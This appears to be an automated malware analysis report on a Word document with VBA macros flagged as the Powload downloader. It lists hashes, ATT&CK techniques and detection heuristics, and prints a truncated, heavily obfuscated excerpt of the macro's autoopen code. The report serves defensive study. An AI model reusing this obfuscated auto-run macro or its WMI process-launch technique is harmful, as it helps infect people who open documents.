Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db2e803c063b6a8d…

MALICIOUS

Office (OLE)

186.8 KB Created: 2019-04-25 13:36:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 5b58a64803a655cd55442a271b342632 SHA-1: 31b36ca2453217154c94a3aec69f667f22d50234 SHA-256: db2e803c063b6a8d618aa3aa5ad2bb2ee303b496e647a5b82a79dbbbaabff95b
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon document opening. The macro utilizes GetObject and CreateObject to launch a WMI Win32_Process, indicating an attempt to execute arbitrary commands or download a secondary payload. The ClamAV detection name 'Doc.Downloader.Powload-6956244-0' further supports the downloader functionality.

Heuristics 8

  • ClamAV: Doc.Downloader.Powload-6956244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6956244-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29309 bytes
SHA-256: 99888bc8088022874a698f4e5d3e6853bba3b5d7243f8434685c6becdd403e77
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SADAcAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zBQQQBA"
Attribute VB_Base = "0{9C31BECD-AC35-4988-BEE6-76D1ABE2D9C0}{E3DBEEFC-40DB-402D-BF84-8AB8D1CF46F7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Vk1xA1"
Attribute VB_Base = "0{921EC0C3-F11E-4C0F-B790-7EE22CCBC998}{A357984B-B830-490C-A686-DA4C71181229}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MUAAC1"
Sub autoopen()
   If JAQwUAB = AkcQUUG Then
ElseIf iBQDAAA = ADCBAZ Then
            JAX_ABkU = CVar(807281421)
ElseIf HcAoAxx = EAAUUABU Then
            YZo4QD = Hex(310567)
ElseIf NAGDAA = T_oAAw Then
            AcAAkAAG = CInt(633586835)
ElseIf NDDQAo = MUAUDQ Then
End If
   If rkUABB = jAkQ_XU Then
ElseIf mAZAkAQ4 = ZADwwUo Then
            cADB_A1Z = CVar(31960144)
ElseIf kAkoQX4 = YBA1A4DA Then
            G4U4oCDA = Hex(41225167)
ElseIf IZQkUAxZ = p1A1UA Then
            t1cAkCB = CInt(313772777)
ElseIf wXAB4A = FXAQAA Then
End If
   If zxAoAk = HZ4AAD Then
ElseIf oBwAUBc = mAoDACB Then
            sAA4UA = CVar(900172470)
ElseIf SXBXwwAA = ZZkx1_1U Then
            QQx4XA = Hex(373829164)
ElseIf scQABA = cXG_XABB Then
            pQAUQwxG = CInt(814007855)
ElseIf zcBc_DAC = TD4AQx Then
End If
uUA1oG
   If XABDDAC = WAk4AQAA Then
ElseIf fA_BAoA = qAGxckQ Then
            QDkACDB = CVar(486341377)
ElseIf lADABAG = K4XQ1DGU Then
            HZ1AAB = Hex(376816496)
ElseIf PUxQDAAA = FDACBQQ Then
            rB1GDDU = CInt(14870675)
ElseIf pXXAxo4X = wkQAxAAA Then
End If
   If ZQAAAA4x = WAcAAAZG Then
ElseIf BABAA1 = sUAxcCA Then
            NAB1oQ = CVar(555578273)
ElseIf VQADAoA1 = wxUAAX Then
            pUAAZoUw = Hex(29558707)
ElseIf GBxxBoQD = HoUXAAx Then
            FkUcQxQD = CInt(290681313)
ElseIf Bo4AA4C = nwDUAA Then
End If
   If SAQwGA = mDckZAx Then
ElseIf nD_kAA = DAcABD Then
            OQXQAcDA = CVar(623544105)
ElseIf AB_AAA = rokAcB Then
            wAAAUAD = Hex(233060568)
ElseIf hDQxAZAX = fAUkUXo Then
            pwGkDA = CInt(221528681)
ElseIf XAwwAAAD = Y4cQX_cZ Then
End If
End Sub
Function fBcC_Q(EGwQXxQZ)
   If QAZAA_Ax = zxAQ4w Then
ElseIf pAAkkAA = cQD1cB Then
            kGDGUA = CVar(983503055)
ElseIf GCwUZU = lAxXAAw Then
            oABQx_ = Hex(653498948)
ElseIf cUQDZQDA = JQADBCAU Then
            p4AoZcUA = CInt(442485490)
ElseIf dX4Bk44 = rcADBG Then
End If
   If O_D1BA1 = dAAwBoB Then
ElseIf pc4oAG4 = PDAD_xA Then
            PAZoXA = CVar(368013455)
ElseIf tCQAGA = OQUBUGA Then
            kGwAAA = Hex(955606080)
ElseIf oAAQQZZ = poAUQcAA Then
            Po_UoA = CInt(119563226)
ElseIf sAABAAAA = AADCCxk Then
End If
Set fBcC_Q = CVar(EGwQXxQZ)
   If YU4kAQ_ = pGAABxoX Then
ElseIf z1ABAGD1 = hUAGXA Then
            PBAACA = CVar(131534684)
ElseIf EQDAkAG = WAc_AwA Then
            EDB4A4 = Hex(817071654)
ElseIf MAAwAA = aDwQAA Then
            KBDAAwD4 = CInt(787289538)
ElseIf p_BZDXA_ = KDAXGU Then
End If
   If tQAAAA = BQUAAQX Then
ElseIf ckQwAA = LwXoAAG Then
            AGUAUG = CVar(75692798)
ElseIf uAxA_Dc = VXCCA_D Then
            E4GkAQA = Hex(517121053)
ElseIf MA_UAB = cBQkA_AA Then
            CoAAok = CInt(989270378)
ElseIf pkw4CBA = zZADCQA Then
End If
   If jAUxQA = SxGA__ Then
ElseIf NDGcA_U = LAckcU Then
            GcoxUGXx = CVar(627866982)
ElseIf EDcAAAG = XAAUGBBG Then
            SAAZAZ = Hex(374839455)
ElseIf j_cAAAC = jDX1AA Then
            rAABkZAB = CInt(363231268)
ElseIf tGAQDk 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.